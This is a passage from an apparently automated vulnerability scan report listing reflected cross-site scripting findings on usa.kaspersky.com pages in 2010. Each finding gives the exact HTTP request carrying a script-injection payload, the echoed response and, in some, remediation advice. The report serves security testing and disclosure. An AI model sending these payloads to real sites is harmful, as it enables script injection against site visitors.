Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:00:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688039"
Content-Type: text/html; charset=utf-8
Content-Length: 28750
Date: Sat, 18 Dec 2010 16:00:56 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5897/lightbox26ab62"><script>alert(1)</script>29d08b982c0" />
...[SNIP]...

1.234. http://usa.kaspersky.com/node/5897/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3678c"><script>alert(1)</script>46f3bfec580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5897/lightbox2?3678c"><script>alert(1)</script>46f3bfec580=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:52:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687547"
Content-Type: text/html; charset=utf-8
Content-Length: 13314
Date: Sat, 18 Dec 2010 15:52:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5897/lightbox2?3678c"><script>alert(1)</script>46f3bfec580=1" />
...[SNIP]...

1.235. http://usa.kaspersky.com/node/8672 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/8672

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7803"-alert(1)-"24ebfa7bc5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodec7803"-alert(1)-"24ebfa7bc5a/8672 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685539"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:19:02 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodec7803"-alert(1)-"24ebfa7bc5a/8672";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.236. http://usa.kaspersky.com/node/8672 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/8672

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8d6"><script>alert(1)</script>de72fac2a2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node9d8d6"><script>alert(1)</script>de72fac2a2c/8672 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:18:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685526"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:18:51 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node9d8d6"><script>alert(1)</script>de72fac2a2c/8672" />
...[SNIP]...

1.237. http://usa.kaspersky.com/node/8672 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/8672

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e10ec"-alert(1)-"076ca4d7779 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/8672e10ec"-alert(1)-"076ca4d7779 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685696"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:21:43 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/8672e10ec"-alert(1)-"076ca4d7779";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.238. http://usa.kaspersky.com/node/8672 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/8672

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2042e"><script>alert(1)</script>fd921bf409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/86722042e"><script>alert(1)</script>fd921bf409 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.2.10.1292684729; gpv_pageName=Homepage; s_nr=1292684738017-Repeat

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:21:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685669"
Content-Type: text/html; charset=utf-8
Content-Length: 29332
Date: Sat, 18 Dec 2010 15:21:18 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/86722042e"><script>alert(1)</script>fd921bf409" />
...[SNIP]...

1.239. http://usa.kaspersky.com/partners [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93ea2"-alert(1)-"d5bb19cdbbd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partners93ea2"-alert(1)-"d5bb19cdbbd HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687653"
Content-Type: text/html; charset=utf-8
Content-Length: 30000
Date: Sat, 18 Dec 2010 15:54:20 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/partners93ea2"-alert(1)-"d5bb19cdbbd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.240. http://usa.kaspersky.com/partners [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64be9"><script>alert(1)</script>8a4df566c52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners64be9"><script>alert(1)</script>8a4df566c52 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:53:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687635"
Content-Type: text/html; charset=utf-8
Content-Length: 30097
Date: Sat, 18 Dec 2010 15:54:01 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners64be9"><script>alert(1)</script>8a4df566c52" />
...[SNIP]...

1.241. http://usa.kaspersky.com/partners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfd9"><script>alert(1)</script>d8277e02ad7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners?bcfd9"><script>alert(1)</script>d8277e02ad7=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687509"
Content-Type: text/html; charset=utf-8
Content-Length: 33738
Date: Sat, 18 Dec 2010 15:51:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners?bcfd9"><script>alert(1)</script>d8277e02ad7=1" />
...[SNIP]...

1.242. http://usa.kaspersky.com/partners/affiliate-partnerships%20 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/affiliate-partnerships%20

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a0c"><script>alert(1)</script>3319157881c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners/b5a0c"><script>alert(1)</script>3319157881c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687727"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:55:44 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners/b5a0c"><script>alert(1)</script>3319157881c" />
...[SNIP]...

1.243. http://usa.kaspersky.com/partners/affiliate-partnerships%20 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/affiliate-partnerships%20

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb2d"-alert(1)-"ba3623a5aea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partners/ecb2d"-alert(1)-"ba3623a5aea HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687759"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:56:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/partners/ecb2d"-alert(1)-"ba3623a5aea";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.244. http://usa.kaspersky.com/partners/affiliate-partnerships%20 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/affiliate-partnerships%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 545ed"><script>alert(1)</script>4c1facddbc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners/affiliate-partnerships%20?545ed"><script>alert(1)</script>4c1facddbc5=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687518"
Content-Type: text/html; charset=utf-8
Content-Length: 32459
Date: Sat, 18 Dec 2010 15:52:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners/affiliate-partnerships%20?545ed"><script>alert(1)</script>4c1facddbc5=1" />
...[SNIP]...

1.245. http://usa.kaspersky.com/partners/technology-alliances-partnerships [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/technology-alliances-partnerships

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4570b"-alert(1)-"76f086190e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partners4570b"-alert(1)-"76f086190e3/technology-alliances-partnerships HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687737"
Content-Type: text/html; charset=utf-8
Content-Length: 30204
Date: Sat, 18 Dec 2010 15:55:53 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/partners4570b"-alert(1)-"76f086190e3/technology-alliances-partnerships";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.246. http://usa.kaspersky.com/partners/technology-alliances-partnerships [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/technology-alliances-partnerships

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 188c0"><script>alert(1)</script>1d8c6910a8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners188c0"><script>alert(1)</script>1d8c6910a8d/technology-alliances-partnerships HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
